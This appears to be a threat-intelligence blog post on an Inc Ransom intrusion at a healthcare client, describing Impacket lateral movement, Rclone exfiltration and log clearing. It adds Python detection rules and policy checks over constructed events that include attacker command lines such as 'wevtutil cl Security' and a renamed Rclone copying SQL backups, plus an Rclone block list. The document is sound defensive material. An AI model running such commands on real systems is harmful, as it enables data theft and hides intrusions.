Inc Ransom Attack: Evolving Extortion Techniques Target Healthcare Sector


The original image was generated by OpenAI's DALL-E and edited by the author. Source: OpenAI (September 2024)

Introduction

In August 2024, cybersecurity firm ReliaQuest uncovered a significant ransomware attack targeting a healthcare client. The attack was attributed to the notorious ransomware group "Inc Ransom." While typically known for their double-extortion attacks, which combine data theft with encryption, this latest incident diverged by solely focusing on data exfiltration without encrypting the client's systems. The breach highlights the group's evolving methods and the persistent threat they pose to organizations across various sectors, including healthcare, government, and education.

Report Overview

Inc Ransom, active since July 2023, is notorious for its sophisticated ransomware campaigns, having extorted an average of 11 organizations per month. The group has previously targeted high-profile entities such as Xerox and NHS Scotland, often gaining entry through known vulnerabilities such as the Citrix NetScaler flaw CVE-2023-3519. Its attacks consistently apply pressure on victims through ransom notes, even going as far as printing them on compromised network printers.

The August attack followed a clear pattern of progression. Initial access was likely achieved through a firewall vulnerability, allowing Inc Ransom to compromise a service account used for backup management. From there, the attackers used tools like net.exe to gather information on the network and the Impacket module wmiexec.py for lateral movement. They also employed secretsdump.py to extract credentials, further solidifying their foothold in the network.

Once inside, the attackers used Rclone, a popular data-transfer tool, to exfiltrate sensitive SQL database files. To mask their activity, they relied on common utilities such as PowerShell and wevtutil to clear Windows event logs, further complicating detection efforts.
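The intrusion chain above (net.exe reconnaissance, wmiexec.py lateral movement, a renamed Rclone binary, and wevtutil log clearing) maps onto a small set of process-creation and audit-log detections. The following is an added illustration, not ReliaQuest's detection content: it runs five rules over constructed events shaped like Sysmon Event ID 1 (ProcessCreate) and Security Event ID 1102 (audit log cleared), then correlates hits per account so a single service account tripping several stages stands out. Hostnames, user names and command lines are constructed placeholders; the `1> \\127.0.0.1\ADMIN$\__<timestamp>` redirect is the output-capture pattern wmiexec.py is widely documented to use.

```python
"""Detection rules for the Inc Ransom tradecraft described above (added example).

Runs over constructed Sysmon-style process-creation events and a Security
1102 event; no real telemetry is read.
"""
import re
from collections import defaultdict

# Constructed sample events. Field names mirror Sysmon Event ID 1 and
# Security Event ID 1102; every value is a placeholder.
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "BACKUP01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\net.exe", "original_file_name": "net.exe",
     "command_line": 'net group "Domain Admins" /domain'},
    {"event_id": 1, "host": "SQL02", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\cmd.exe", "original_file_name": "Cmd.Exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1724000000.1 2>&1"},
    {"event_id": 1, "host": "SQL02", "user": "CORP\\svc_backup",
     # Binary renamed to look like svchost; the PE OriginalFileName still says rclone.
     "image": r"C:\Users\Public\svchost.exe", "original_file_name": "rclone.exe",
     "command_line": r"svchost.exe copy D:\SQLBackups remote:dump --transfers 8"},
    {"event_id": 1, "host": "SQL02", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\wevtutil.exe", "original_file_name": "wevtutil.exe",
     "command_line": "wevtutil cl Security"},
    {"event_id": 1102, "host": "SQL02", "user": "CORP\\svc_backup"},
    {"event_id": 1, "host": "WS17", "user": "CORP\\alice",          # benign noise
     "image": r"C:\Windows\System32\net.exe", "original_file_name": "net.exe",
     "command_line": r"net use H: \\fs01\home"},
]


def _cmd(event):
    return event.get("command_line", "").lower()


def _orig(event):
    return event.get("original_file_name", "").lower()


# Each rule: (name, predicate). Matching on OriginalFileName rather than the
# on-disk path catches renamed binaries such as the Rclone copy above.
RULES = [
    ("ad_recon_net_exe", lambda e: e["event_id"] == 1 and _orig(e) == "net.exe"
        and re.search(r"\b(group|user)\b.*/domain", _cmd(e)) is not None),
    ("wmiexec_output_redirect", lambda e: e["event_id"] == 1
        and e.get("parent_image", "").lower().endswith("wmiprvse.exe")
        and re.search(r"1>\s*\\\\127\.0\.0\.1\\admin\$\\__", _cmd(e)) is not None),
    ("rclone_execution", lambda e: e["event_id"] == 1
        and (_orig(e) == "rclone.exe" or "rclone" in _cmd(e))),
    ("event_log_cleared_wevtutil", lambda e: e["event_id"] == 1
        and _orig(e) == "wevtutil.exe"
        and re.search(r"\b(cl|clear-log)\b", _cmd(e)) is not None),
    ("audit_log_cleared_1102", lambda e: e["event_id"] == 1102),
]


def run_detections(events):
    """Return a list of (rule_name, host, user) for every rule an event trips."""
    hits = []
    for event in events:
        for name, predicate in RULES:
            if predicate(event):
                hits.append((name, event["host"], event["user"]))
    return hits


def suspect_accounts(hits, min_rules=3):
    """Accounts that tripped at least `min_rules` distinct rules: the chain,
    not any single tool, is what marks the backup service account here."""
    rules_by_user = defaultdict(set)
    for name, _host, user in hits:
        rules_by_user[user].add(name)
    return {u for u, rules in rules_by_user.items() if len(rules) >= min_rules}


if __name__ == "__main__":
    found = run_detections(SAMPLE_EVENTS)
    for hit in found:
        print("%-28s host=%-9s user=%s" % hit)
    print("accounts spanning multiple stages:", suspect_accounts(found))
```

The correlation step is the point: any one of these rules fires on legitimate administration now and then, but a backup service account that performs domain-group enumeration, receives WMI-spawned shells, runs a renamed Rclone and then clears the Security log has no benign explanation.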

Insights and Analysis

The healthcare client faced the immediate threat of sensitive patient and organizational data being publicly exposed if the ransom demands were not met. The potential consequences of such exposure included reputational damage, compliance violations, and operational disruptions. The attackers' use of legitimate tools like Rclone and Impacket made detection more challenging, potentially delaying response times and increasing the attack's severity.

Service account management played a pivotal role in this attack. Service accounts, often overlooked in security programs, are critical targets because of their elevated privileges and broad reach across a network. Inc Ransom's abuse of such an account allowed them to bypass traditional security measures and carry out their attack with minimal detection.

ReliaQuest's investigation emphasized several preventative measures:

  1. Strict Privileged Account Management: Limit service account functions to reduce the attack surface. By assigning specific functions to individual accounts, organizations can better monitor for abnormal behavior and prevent attackers from exploiting broad permissions.
  2. Network Intrusion Prevention: Implement network policies that block domains less than six months old to prevent command-and-control (C2) communications from newly registered malicious domains.
  3. Application Control: Enforce strict application controls, particularly for tools like Rclone, which may have legitimate uses but are frequently exploited for malicious purposes.
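The three measures above can each be expressed as a policy decision that a logon monitor, DNS filter or application-control layer evaluates. The following is an added example, not ReliaQuest's guidance or tooling: it encodes a per-function scope for each service account, a six-month domain-age gate (approximated here as 182 days, an assumption) and an Rclone block keyed on the PE OriginalFileName with an explicit hash allowlist for a sanctioned build. Account names, hosts, domains and the hash value are constructed placeholders.

```python
"""Policy checks for the three preventative measures (added example).

Everything here is constructed: scopes, domains and hashes are placeholders.
"""
from datetime import date, timedelta

# Measure 1: one function per service account, with the hosts it may log on to.
SERVICE_ACCOUNT_SCOPE = {
    "CORP\\svc_backup":   {"function": "backup",    "hosts": {"BACKUP01", "BACKUP02"}},
    "CORP\\svc_sqlagent": {"function": "sql-agent", "hosts": {"SQL02"}},
}

# Measure 3: block by OriginalFileName (survives renaming), but allow an
# approved Rclone build on the hosts that legitimately run it.
BLOCKED_ORIGINAL_NAMES = {"rclone.exe"}
APPROVED_BUILDS = {
    # PLACEHOLDER hash of a sanctioned Rclone build; replace with the real SHA-256.
    "rclone.exe": {"sha256": "0000000000000000000000000000000000000000000000000000000000000000",
                   "hosts": {"BACKUP01"}},
}

MIN_DOMAIN_AGE = timedelta(days=182)   # "six months", approximated


def check_logon(account, host):
    """allowed / out_of_scope / unknown_account for a service-account logon."""
    scope = SERVICE_ACCOUNT_SCOPE.get(account)
    if scope is None:
        return "unknown_account"
    return "allowed" if host in scope["hosts"] else "out_of_scope"


def domain_decision(domain, created_on, today=None):
    """allow / block_new_domain / review_unknown_age for an outbound domain.

    A domain whose registration date cannot be determined is sent for review
    rather than silently allowed (fail closed on missing data).
    """
    today = today or date.today()
    if created_on is None:
        return "review_unknown_age"
    return "allow" if today - created_on >= MIN_DOMAIN_AGE else "block_new_domain"


def app_control_decision(original_file_name, sha256, host):
    """allow / block for a process start, keyed on PE OriginalFileName."""
    name = original_file_name.lower()
    if name not in BLOCKED_ORIGINAL_NAMES:
        return "allow"
    approved = APPROVED_BUILDS.get(name)
    if approved and sha256.lower() == approved["sha256"] and host in approved["hosts"]:
        return "allow"
    return "block"


def evaluate(events, today):
    """Apply the matching check to each constructed event; returns decisions."""
    decisions = []
    for ev in events:
        if ev["kind"] == "logon":
            decisions.append(check_logon(ev["account"], ev["host"]))
        elif ev["kind"] == "dns":
            decisions.append(domain_decision(ev["domain"], ev["created_on"], today))
        elif ev["kind"] == "process":
            decisions.append(app_control_decision(ev["original_file_name"], ev["sha256"], ev["host"]))
    return decisions


# Constructed sample events covering the three controls.
SAMPLE_EVENTS = [
    {"kind": "logon", "account": "CORP\\svc_backup", "host": "BACKUP01"},
    {"kind": "logon", "account": "CORP\\svc_backup", "host": "SQL02"},       # backup account on a SQL host
    {"kind": "dns", "domain": "vendor-updates.example", "created_on": date(2019, 3, 2)},
    {"kind": "dns", "domain": "c2-lookalike.example", "created_on": date(2024, 7, 1)},
    {"kind": "dns", "domain": "no-whois.example", "created_on": None},
    {"kind": "process", "original_file_name": "rclone.exe", "host": "SQL02",
     "sha256": "ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"},
    {"kind": "process", "original_file_name": "rclone.exe", "host": "BACKUP01",
     "sha256": "0000000000000000000000000000000000000000000000000000000000000000"},
    {"kind": "process", "original_file_name": "wevtutil.exe", "host": "SQL02", "sha256": "n/a"},
]

if __name__ == "__main__":
    for ev, decision in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS, date(2024, 8, 15))):
        print(f"{ev['kind']:8} -> {decision}")
```

Note that wevtutil is not on the block list in this example: application control targets tools with little legitimate use on most hosts (Rclone), while log clearing is better handled by the detection rules and by forwarding event logs off-host so that a local `wevtutil cl` destroys nothing the SOC relies on.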

Inc Ransom's latest campaign against the healthcare industry illustrates the evolving nature of ransomware attacks. Their continued use of common tools and their ability to abuse service accounts with broad privileges underscore the need for tighter security controls. By implementing strict account management and enhancing detection capabilities, organizations can reduce their exposure to ransomware threats and mitigate the potential damage caused by groups like Inc Ransom.

References

Inc Ransom Attack Analysis: Extortion Methodologies - ReliaQuest
This report details the various stages of an Inc Ransomware attack intrusion lifecycle, from exploiting a firewall to the use of Windows log manager and PowerShell for defense evasion.